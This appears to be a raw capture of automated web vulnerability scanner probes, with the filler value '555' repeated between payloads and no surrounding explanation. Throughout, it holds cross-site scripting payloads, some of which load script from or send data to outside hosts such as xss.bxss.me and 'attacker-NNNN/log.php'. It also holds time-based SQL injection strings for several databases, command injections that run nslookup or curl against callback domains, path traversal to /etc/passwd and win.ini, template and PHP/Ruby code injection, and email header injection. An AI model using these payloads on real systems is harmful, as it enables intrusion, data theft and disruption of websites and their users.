555<isindex type=image src=1 onerror=oSNp(9455)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9107'>
555<body onload=oSNp(9385)>
555<img src=//xss.bxss.me/t/dot.gif onload=oSNp(9256)>
555<img src=xyz OnErRor=oSNp(9070)>
555<img/src=">" onerror=alert(9504)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%53%4E%70%289016%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\oSNp(9080)\u003C/sCripT\u003E
555<ScRiPt>oSNp(9178)</sCripT>
%F6<img zzz onmouseover=oSNp(95631) //%F6>
555<input autofocus onfocus=oSNp(9529)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(oSNp(9288))}
555eKTDr
<ScRiPt >oSNp(9051)</ScRiPt>
555<WB4ALZ>7WVSR[!+!]</WB4ALZ>
555<ifRAme sRc=9948.com></IfRamE>
555<a548gWc x=9624>
555<img sRc='http://attacker-9153/log.php?
555<aTjtam1<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >Ydhn(9946)</ScRiPt>
555
'"()&%<zzz><ScRiPt >Ydhn(9874)</ScRiPt>
555
5559506993
555
bfg6961<s1﹥s2ʺs3ʹhjl6961
555
bfgx3237%C0%BEz1%C0%BCz2a%90bcxhjl3237
555
555
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >Ydhn(9990)</ScRiPt>
555
555<WC8G1Y>OP1DX[!+!]</WC8G1Y>
555
555<script>Ydhn(9425)</script>
555
555<ScR<ScRiPt>IpT>Ydhn(9955)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>Ydhn(9598)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9565></ScRiPt>
555
555<isindex type=image src=1 onerror=Ydhn(9107)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9531'>
555
555<body onload=Ydhn(9426)>
555<img src=//xss.bxss.me/t/dot.gif onload=Ydhn(9987)>
555
555<img src=xyz OnErRor=Ydhn(9374)>
555
555<img/src=">" onerror=alert(9778)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%59%64%68%6E%289298%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\Ydhn(9640)\u003C/sCripT\u003E
555
555<ScRiPt>Ydhn(9111)</sCripT>
555
%F6<img zzz onmouseover=Ydhn(96041) //%F6>
555
555<input autofocus onfocus=Ydhn(9745)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555
555}body{zzz:Expre/**/SSion(Ydhn(9891))}
555
555ffRZf
<ScRiPt >Ydhn(9396)</ScRiPt>
555
555<W1GKKZ>JVFA8[!+!]</W1GKKZ>
555
555<ifRAme sRc=9708.com></IfRamE>
555<aTzwl70 x=9878>
555
555<img sRc='http://attacker-9192/log.php?
555<a2nzulK<
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
"+"A".concat(70-3).concat(22*4).concat(114).concat(86).concat(120).concat(65)+(require"socket"
Socket.gethostbyname("hitwu"+"zelzcuki7f5ae.bxss.me.")[3].to_s)+"
xfs.bxss.me
555
'+'A'.concat(70-3).concat(22*4).concat(103).concat(68).concat(104).concat(69)+(require'socket'
Socket.gethostbyname('hithu'+'vryxiqoh94f77.bxss.me.')[3].to_s)+'
response.write(9226309*9319962)
555
555
'+response.write(9226309*9319962)+'
555
NewsCommentAdd
"+response.write(9226309*9319962)+"
555
555
NewsCommentAdd/.
555
555
555
555
555
555
555
555
bcc:009247.4995-46594.4995.8c842.20036.2@bxss.me
976K8B9j
to@example.com>
bcc:009247.4995-46595.4995.8c842.20036.2@bxss.me
555
555
echo pdejby$()\ fjgebf\nz^xyu||a #' &echo pdejby$()\ fjgebf\nz^xyu||a #|" &echo pdejby$()\ fjgebf\nz^xyu||a #
555
555
555
&echo wlmbfw$()\ cvfose\nz^xyu||a #' &echo wlmbfw$()\ cvfose\nz^xyu||a #|" &echo wlmbfw$()\ cvfose\nz^xyu||a #
555
555
555
555
|echo yubuxe$()\ ytjtbu\nz^xyu||a #' |echo yubuxe$()\ ytjtbu\nz^xyu||a #|" |echo yubuxe$()\ ytjtbu\nz^xyu||a #
555
../../../../../../../../../../../../../../etc/passwd
(nslookup -q=cname hitgbrzuziudf3aee5.bxss.me||curl hitgbrzuziudf3aee5.bxss.me))
${9999280+10000222}
555<esi:include src="http://bxss.me/rpb.png"/>
555
../../../../../../../../../../../../../../windows/win.ini
555
$(nslookup -q=cname hitfwkehhzcpee51ca.bxss.me||curl hitfwkehhzcpee51ca.bxss.me)
555
555
555
file:///etc/passwd
555
&nslookup -q=cname hitdogpzrmdobcf928.bxss.me&'\"`0&nslookup -q=cname hitdogpzrmdobcf928.bxss.me&`'
555
'.gethostbyname(lc('hitkp'.'zcwvuqvle681a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(114).chr(73).'
555
".gethostbyname(lc("hitbu"."wpzzgfrfbb058.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(82).chr(112).chr(74)."
&(nslookup -q=cname hitzlqozrvmnh35773.bxss.me||curl hitzlqozrvmnh35773.bxss.me)&'\"`0&(nslookup -q=cname hitzlqozrvmnh35773.bxss.me||curl hitzlqozrvmnh35773.bxss.me)&`'
../555
|(nslookup -q=cname hitmbhjtycohr7beae.bxss.me||curl hitmbhjtycohr7beae.bxss.me)
555
555
`(nslookup -q=cname hitzwxautdyaj445e9.bxss.me||curl hitzwxautdyaj445e9.bxss.me)`
;(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)|(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)&(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)
HttP://bxss.me/t/xss.html?%00
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
bxss.me/t/xss.html?%00
555
';print(md5(31337));$a='
555
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
'"
555
555
555
<!--
555
)
555
555
555
555
555
555
555
555
555
1C2Y7gcgbaO
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
-1 OR 2+587-587-1=0+0+0+1 --
555'&&sleep(27*1000)*mgfubh&&'
555
-1 OR 2+348-348-1=0+0+0+1
555'"()&%<zzz><ScRiPt >MoDo(9547)</ScRiPt>
555
555"&&sleep(27*1000)*qdnqhn&&"
-1' OR 2+507-507-1=0+0+0+1 --
555
555'||sleep(27*1000)*bagyph||'
-1' OR 2+13-13-1=0+0+0+1 or 'zJ6ybyju'='
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555&n900867=v970814
555"||sleep(27*1000)*bqhfab||"
-1" OR 2+611-611-1=0+0+0+1 --
555
555
555
555
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
'"()&%<zzz><ScRiPt >MoDo(9636)</ScRiPt>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Http://bxss.me/t/fit.txt
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
http://bxss.me/t/fit.txt?.jpg
555
-1; waitfor delay '0:0:15' --
/etc/shells
555
-1); waitfor delay '0:0:15' --
555
555
c:/windows/win.ini
555
bxss.me
5559814510
-1)); waitfor delay '0:0:15' --
555
555
555
1 waitfor delay '0:0:15' --
555
P2eeGYC5'; waitfor delay '0:0:15' --
555
555
D1ayOlXE'); waitfor delay '0:0:15' --
555
555
QP1FkKBn')); waitfor delay '0:0:15' --
555
555
-5 OR 24=(SELECT 24 FROM PG_SLEEP(15))--
555
-5) OR 946=(SELECT 946 FROM PG_SLEEP(15))--
-1)) OR 303=(SELECT 303 FROM PG_SLEEP(15))--
haEtQS4x' OR 922=(SELECT 922 FROM PG_SLEEP(15))--
kAgB8euB') OR 666=(SELECT 666 FROM PG_SLEEP(15))--
qMZfrfgu')) OR 550=(SELECT 550 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
1'"
555
555
@@p69cj
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bfg1794<s1﹥s2ʺs3ʹhjl1794
bfgx1255%C0%BEz1%C0%BCz2a%90bcxhjl1255
bfgx1255%C0%BEz1%C0%BCz2a%90bcxhjl1255
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
555
555
555
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555
555<ScRiPt >MoDo(9980)</ScRiPt>
555
555
555
555
555
555
555<WUGGYO>GUH5A[!+!]</WUGGYO>
555
555
555
555<script>MoDo(9212)</script>
555
555
555
555<ScR<ScRiPt>IpT>MoDo(9652)</sCr<ScRiPt>IpT>
555<ScRiPt
>MoDo(9516)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9146></ScRiPt>
555<isindex type=image src=1 onerror=MoDo(9757)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9531'>
555<body onload=MoDo(9485)>
555<img src=//xss.bxss.me/t/dot.gif onload=MoDo(9970)>
555<img src=xyz OnErRor=MoDo(9016)>
555<img/src=">" onerror=alert(9893)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%6F%44%6F%289865%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\MoDo(9923)\u003C/sCripT\u003E
555<ScRiPt>MoDo(9913)</sCripT>
%F6<img zzz onmouseover=MoDo(93271) //%F6>
555<input autofocus onfocus=MoDo(9494)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(MoDo(9765))}
555wMJ0Y
<ScRiPt >MoDo(9856)</ScRiPt>
555<W9TBRJ>JQACW[!+!]</W9TBRJ>
555<ifRAme sRc=9502.com></IfRamE>
555<aQ7ZMBM x=9626>
555<img sRc='http://attacker-9400/log.php?
555<agTdM9U<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >ww0j(9513)</ScRiPt>
555
'"()&%<zzz><ScRiPt >ww0j(9823)</ScRiPt>
555
5559405766
bfg6329<s1﹥s2ʺs3ʹhjl6329
555
bfgx10009%C0%BEz1%C0%BCz2a%90bcxhjl10009
555
555
<%={{={@{#{${dfb}}%>
555
555
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >ww0j(9674)</ScRiPt>
555<WBZJNM>EBTCR[!+!]</WBZJNM>
555
555
555<script>ww0j(9813)</script>
555<ScR<ScRiPt>IpT>ww0j(9298)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>ww0j(9176)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9863></ScRiPt>
555
555
555<isindex type=image src=1 onerror=ww0j(9206)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9880'>
555
555<body onload=ww0j(9840)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=ww0j(9338)>
555
555<img src=xyz OnErRor=ww0j(9125)>
555
555<img/src=">" onerror=alert(9183)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%77%30%6A%289076%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\ww0j(9068)\u003C/sCripT\u003E
555
555<ScRiPt>ww0j(9424)</sCripT>
555
%F6<img zzz onmouseover=ww0j(96541) //%F6>
555
555<input autofocus onfocus=ww0j(9508)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(ww0j(9619))}
555
555COAVl
<ScRiPt >ww0j(9330)</ScRiPt>
555
555<W9UT2M>GX47U[!+!]</W9UT2M>
555
555
555<ifRAme sRc=9233.com></IfRamE>
555
555<aaQjqHf x=9959>
555
555<img sRc='http://attacker-9788/log.php?
555
555<aMApQZw<
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
555
555
response.write(9275593*9973358)
'+response.write(9275593*9973358)+'
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(89).concat(112).concat(74)+(require"socket"
Socket.gethostbyname("hitwc"+"sioxrtai5695e.bxss.me.")[3].to_s)+"
555
"+response.write(9275593*9973358)+"
NewsCommentAdd
'+'A'.concat(70-3).concat(22*4).concat(111).concat(71).concat(113).concat(84)+(require'socket'
Socket.gethostbyname('hittj'+'wtvlivgje4323.bxss.me.')[3].to_s)+'
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
555
555
H6pI1z6R
555
NewsCommentAdd/.
555
555
555
555
555
555
555
555
555
555
555
bcc:009247.5083-44098.5083.328f2.20036.2@bxss.me
555
to@example.com>
bcc:009247.5083-44099.5083.328f2.20036.2@bxss.me
555<esi:include src="http://bxss.me/rpb.png"/>
555
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
echo qbwswb$()\ cwpgsh\nz^xyu||a #' &echo qbwswb$()\ cwpgsh\nz^xyu||a #|" &echo qbwswb$()\ cwpgsh\nz^xyu||a #
555
555
${9999223+9999966}
file:///etc/passwd
&echo ekaapb$()\ bgmgfi\nz^xyu||a #' &echo ekaapb$()\ bgmgfi\nz^xyu||a #|" &echo ekaapb$()\ bgmgfi\nz^xyu||a #
555
555
555
|echo sflegb$()\ dvalog\nz^xyu||a #' |echo sflegb$()\ dvalog\nz^xyu||a #|" |echo sflegb$()\ dvalog\nz^xyu||a #
555
'.gethostbyname(lc('hityq'.'nhtuufxg7ae9c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(90).chr(113).chr(76).'
../555
(nslookup -q=cname hitfmhpntgizy879cd.bxss.me||curl hitfmhpntgizy879cd.bxss.me))
555
555
555
".gethostbyname(lc("hitlz"."xcfekdkw590c0.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(76).chr(112).chr(71)."
$(nslookup -q=cname hitglspewbivmaa2fa.bxss.me||curl hitglspewbivmaa2fa.bxss.me)
555
&nslookup -q=cname hitwdrncweqyy573c1.bxss.me&'\"`0&nslookup -q=cname hitwdrncweqyy573c1.bxss.me&`'
555
555
555
555
555
&(nslookup -q=cname hitojqmddgsxc378f2.bxss.me||curl hitojqmddgsxc378f2.bxss.me)&'\"`0&(nslookup -q=cname hitojqmddgsxc378f2.bxss.me||curl hitojqmddgsxc378f2.bxss.me)&`'
555
'"
|(nslookup -q=cname hittqgdrqvpqy12d39.bxss.me||curl hittqgdrqvpqy12d39.bxss.me)
HttP://bxss.me/t/xss.html?%00
<!--
555
555
`(nslookup -q=cname hitmzeiirweui3207e.bxss.me||curl hitmzeiirweui3207e.bxss.me)`
bxss.me/t/xss.html?%00
555
555
555
;(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)|(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)&(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)
)
555
555
555
!(()&&!|*|*|
555
-1 OR 2+531-531-1=0+0+0+1 --
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
^(#$!@#$)(()))******
555
-1 OR 2+779-779-1=0+0+0+1
555
';print(md5(31337));$a='
555
-1' OR 2+369-369-1=0+0+0+1 --
555
555
555
555
-1' OR 2+497-497-1=0+0+0+1 or 'INHYjiev'='
";print(md5(31337));$a="
555
555
555
555
555
-1" OR 2+59-59-1=0+0+0+1 --
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
if(now()=sysdate(),sleep(15),0)
555
1DrYLycIhVO
'.print(md5(31337)).'
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
-1; waitfor delay '0:0:15' --
555
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
555
555&n935754=v987532
1 waitfor delay '0:0:15' --
555
tMX26P3x'; waitfor delay '0:0:15' --
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555'"()&%<zzz><ScRiPt >UhPc(9575)</ScRiPt>
555
9lrUxbGi'); waitfor delay '0:0:15' --
DjvU52RM')); waitfor delay '0:0:15' --
Http://bxss.me/t/fit.txt
-5 OR 515=(SELECT 515 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >UhPc(9156)</ScRiPt>
'"()
-5) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
555
http://bxss.me/t/fit.txt?.jpg
555'&&sleep(27*1000)*yuctns&&'
-5) OR 478=(SELECT 478 FROM PG_SLEEP(3))--
/etc/shells
555"&&sleep(27*1000)*cfzrdm&&"
555
-1)) OR 717=(SELECT 717 FROM PG_SLEEP(15))--
555'||sleep(27*1000)*ryeetm||'
555
5E7ZlHLy' OR 948=(SELECT 948 FROM PG_SLEEP(15))--
5559523045
555"||sleep(27*1000)*nkuahe||"
555
lIFUxzUY') OR 893=(SELECT 893 FROM PG_SLEEP(15))--
555
kP3Ai5Uq')) OR 73=(SELECT 73 FROM PG_SLEEP(15))--
c:/windows/win.ini
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
bxss.me
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
555
555
555
555
@@wtuOF
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bfg4964<s1﹥s2ʺs3ʹhjl4964
555
555
555
bfgx10306%C0%BEz1%C0%BCz2a%90bcxhjl10306
555
555
555
555
555
<%={{={@{#{${dfb}}%>
555
555
555
555
555
<th:t="${dfb}#foreach
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >UhPc(9217)</ScRiPt>
555<WJFVYK>UDBJO[!+!]</WJFVYK>
555<script>UhPc(9744)</script>
555<ScR<ScRiPt>IpT>UhPc(9194)</sCr<ScRiPt>IpT>
555<ScRiPt
>UhPc(9380)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9331></ScRiPt>
555<isindex type=image src=1 onerror=UhPc(9949)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9234'>
555<body onload=UhPc(9412)>
555<img src=//xss.bxss.me/t/dot.gif onload=UhPc(9703)>
555<img src=xyz OnErRor=UhPc(9242)>
555<img/src=">" onerror=alert(9029)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%55%68%50%63%289459%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\UhPc(9035)\u003C/sCripT\u003E
555<ScRiPt>UhPc(9721)</sCripT>
%F6<img zzz onmouseover=UhPc(91201) //%F6>
555<input autofocus onfocus=UhPc(9421)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(UhPc(9748))}
5559dhlE
<ScRiPt >UhPc(9478)</ScRiPt>
555<WCL7FD>HAFGS[!+!]</WCL7FD>
555<ifRAme sRc=9213.com></IfRamE>
555<ayqQKr6 x=9685>
555<img sRc='http://attacker-9131/log.php?
555<a3hxVan<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >dJ5X(9143)</ScRiPt>
555
'"()&%<zzz><ScRiPt >dJ5X(9134)</ScRiPt>
555
5559226003
555
bfg7417<s1﹥s2ʺs3ʹhjl7417
bfgx4036%C0%BEz1%C0%BCz2a%90bcxhjl4036
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >dJ5X(9745)</ScRiPt>
555
555
555<W8SBWO>H7NRZ[!+!]</W8SBWO>
555
555<script>dJ5X(9690)</script>
555
555
555<ScR<ScRiPt>IpT>dJ5X(9122)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>dJ5X(9901)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9921></ScRiPt>
555
555
555<isindex type=image src=1 onerror=dJ5X(9607)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9179'>
555
555<body onload=dJ5X(9380)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=dJ5X(9498)>
555
555<img src=xyz OnErRor=dJ5X(9132)>
555<img/src=">" onerror=alert(9560)>
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%64%4A%35%58%289477%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\dJ5X(9717)\u003C/sCripT\u003E
555
555<ScRiPt>dJ5X(9594)</sCripT>
555
%F6<img zzz onmouseover=dJ5X(95371) //%F6>
555
555<input autofocus onfocus=dJ5X(9200)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(dJ5X(9827))}
555
555eBbJ0
<ScRiPt >dJ5X(9493)</ScRiPt>
555
555<WOJRTT>NOVDV[!+!]</WOJRTT>
555
555<ifRAme sRc=9142.com></IfRamE>
555
555<a83Uz1g x=9298>
555<img sRc='http://attacker-9931/log.php?
555<aysVqJX<
555
555
555
555